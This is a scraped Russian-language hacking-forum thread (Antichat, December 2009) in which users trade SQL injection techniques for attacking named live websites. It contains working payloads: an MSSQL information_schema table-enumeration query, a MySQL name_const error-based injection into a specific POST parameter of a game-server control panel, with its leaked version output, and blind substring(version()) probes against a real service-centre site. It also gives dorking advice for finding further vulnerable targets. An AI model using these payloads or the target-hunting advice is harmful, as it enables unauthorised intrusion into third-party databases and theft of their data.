Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
28.12.2009, 03:36
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
так случилось такая ситуация. По GET запросу подбирал таблицы на опера типа:
commentary.asp?article=(%53elect+top+1+table_name+ from+information_schema.tables+where+table_name+no t+in+('blabla1','blabla2','blabla3',.............. ....'blabla50')
в результате помоему добился на максимальную длину символов на GET для опера. Теперь уже не принимает больше не одного имени таблицы, но нужные таблицы пока не нашлос.
Как можно обходит этого или как увеличить число символов адресной строки для Opera? |
|
|
28.12.2009, 03:48
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418
Репутация:
386
|
|
в результате помоему добился на максимальную длину символов на GET для опера. Теперь уже не принимает больше не одного имени таблицы, но нужные таблицы пока не нашлос.
Как можно обходит этого или как увеличить число символов адресной строки для Opera?
попробуй отсылать данные каким нить стороним софтом или скриптом, так можно будет обойти ограничение со стороны клиента
|
|
|
|
28.12.2009, 04:13
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
пробовал webscarab но оно тоже работает через браузер ((
|
|
|
|
28.12.2009, 12:57
|
|
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме:
3217552
Репутация:
1668
|
|
Сообщение от YuNi|[c
так случилось такая ситуация. По GET запросу подбирал таблицы на опера типа:
в результате помоему добился на максимальную длину символов на GET для опера. Теперь уже не принимает больше не одного имени таблицы, но нужные таблицы пока не нашлос.
Как можно обходит этого или как увеличить число символов адресной строки для Opera?
----------------------------------------------------
+or+1=(select+top+1+table_name+from+information_sc hema.tables+where+table_name+not+in+(select+top+ Х+table_name+from+information_schema.tables))--
----------------------------------------------------
подставляешь вместо X 1, потом 2 и т.д.
|
|
|
|
28.12.2009, 14:09
|
|
Новичок
Регистрация: 30.10.2009
Сообщений: 21
Провел на форуме:
182669
Репутация:
24
|
|
Код:
http://wow.teletoria.ru/ACP2/index.php?modul=charedit
Не могу найти где Проделать Инъекцию ((
Код:
Notice: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ') and (`account` = 3181) and (`online` = 0) LIMIT 1' at line 1 in /var/www/html/ACP2/modules/charedit.php on line 6
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/html/ACP2/modules/charedit.php on line 7
Вот код
PHP код:
if (mysql_num_rows($res) == 0) { echo 'Not select character!'; }
else {
$cres = mysql_fetch_array($res);
if (($cres['race'] == 1) or ($cres['race'] == 3) or ($cres['race'] == 4) or ($cres['race'] == 7) or ($cres['race'] == 11))
$char_race = 1; //Alliance
if (($cres['race'] == 2) or ($cres['race'] == 5) or ($cres['race'] == 6) or ($cres['race'] == 8) or ($cres['race'] == 10))
$char_race = 2; //Horde
$money = $cres['money'];
$char_lvl = $cres['level'];
|
|
|
|
28.12.2009, 15:57
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
http://acp.svn.beanstalkapp.com/projects/ACP2/modules/charedit.php
PHP код:
if ($_POST['character'] >= 0) {
$c_connect = mysql_connect($c_ip, $c_userdb, $c_pw);
mysql_select_db($c_db, $c_connect);
mysql_query("SET NAMES '$encoding'");
$res = mysql_query("SELECT `name`, `class`, `guid`, `race`, `online`, `gender`, `level`, `money`, `xp` FROM `characters` WHERE (`guid` = ".$_POST['character'].") and (`account` = ".$_SESSION['user_id'].") and (`online` = 0) LIMIT 1") or trigger_error(mysql_error());
Вот здесь $_POST['character']
character=12589)+and+1=(select+*+from(select+*+fro m(select+name_const((version()),14)d)+as+t+join+(s elect+name_const((version()),14)e)b)a)--+
Notice: Duplicate column name '5.0.51a-24-log' in /var/www/html/ACP2/modules/charedit.php on line 6
|
|
|
|
28.12.2009, 17:18
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
Сообщение от RulleR
----------------------------------------------------
+or+1=(select+top+1+table_name+from+information_sc hema.tables+where+table_name+not+in+(select+top+Х+table_name+from+information_schema.tables))--
----------------------------------------------------
подставляешь вместо X 1, потом 2 и т.д.
спс большое очень помогло.
при запросе
PHP код:
(%53elect+top+1+Post_count+from+Total)--
всегда ответ одинаковый
ADODB.Field error '800a0bcd'
Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
где может быть ошибка
Последний раз редактировалось YuNi|[c; 28.12.2009 в 22:11..
|
|
|
|
29.12.2009, 06:35
|
|
Участник форума
Регистрация: 15.05.2009
Сообщений: 111
Провел на форуме:
1179199
Репутация:
127
|
|
Сообщение от v1d0qz
YuNi|[c
Просто видимо там ничего нету.
Я вот тоже решил первый раз выложить свой вопрос по иньекции.
h_ttp://www.dr service.ru/'
Никак немогу подобрать правильный запрос.
ну или тут
h_ttp://www.dr service.ru/service-centers/nn/NNovgorod/drservice52'/
это что за ужас? так низя
я прсмотрел сайт по-моему там врядли гдето можно внедрить инъекцию. может кто поопытнее что-то найдет
в гугле набери: inurl:index.php?id=1 и подставляй в каждой ссылке кавычку для тренировки
|
|
|
|
29.12.2009, 06:48
|
|
Познающий
Регистрация: 21.07.2007
Сообщений: 68
Провел на форуме:
947074
Репутация:
257
|
|
Сообщение от Bramin
это что за ужас? так низя
я прсмотрел сайт по-моему там врядли гдето можно внедрить инъекцию. может кто поопытнее что-то найдет
в гугле набери: inurl:index.php?id=1 и подставляй в каждой ссылке кавычку для тренировки
Ну если не знаешь, то зачем писать?
Для тренировки я использую методы по интересней  А вообще то у меня уже свалка доступа к сайтам с посещаемостью не 1к уников в сутки))
Просто вопросы я чаще всего решаю сам, чем пишу на форуме, а крутить простые скули типа как ты говоришь inurl:index.php?id=1, не очень интересно.
зы. Для меня интерес в выведении допустим того же database(), а не сидеть перебирать таблички и смотреть что в них. Перебирать таблички уже с построенного запроса, это вообще практически ничему не учит. Так что, вот так вот
Вот же допустим выводиться..
http://www.drs ervice.ru/service-centers/nn/NNovgorod/drservice52/'and+1+1='2/
Почему же не выводиться допустим когда вставляем version или другую подобную функцию.
http://www.dr service.ru/service-centers/nn/NNovgorod/drservice52/'and+substr ing(version(),1,1)='5/
Видимо потому что 6 утра и нужно спать)) Бо что-то уже совсем ничего не выводиться )))
Последний раз редактировалось v1d0qz; 29.12.2009 в 18:54..
|
|
|
|
29.12.2009, 09:32
|
|
Участник форума
Регистрация: 15.05.2009
Сообщений: 111
Провел на форуме:
1179199
Репутация:
127
|
|
Сообщение от v1d0qz
Вот же допустим выводиться..
http://www.drs ervice.ru/service-centers/nn/NNovgorod/drservice52/'and+1=1='2/
да не хрена там не выводится и не будет т.к это бред то что ты пишешь.
читай http://forum.antichat.ru/thread19844.html
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
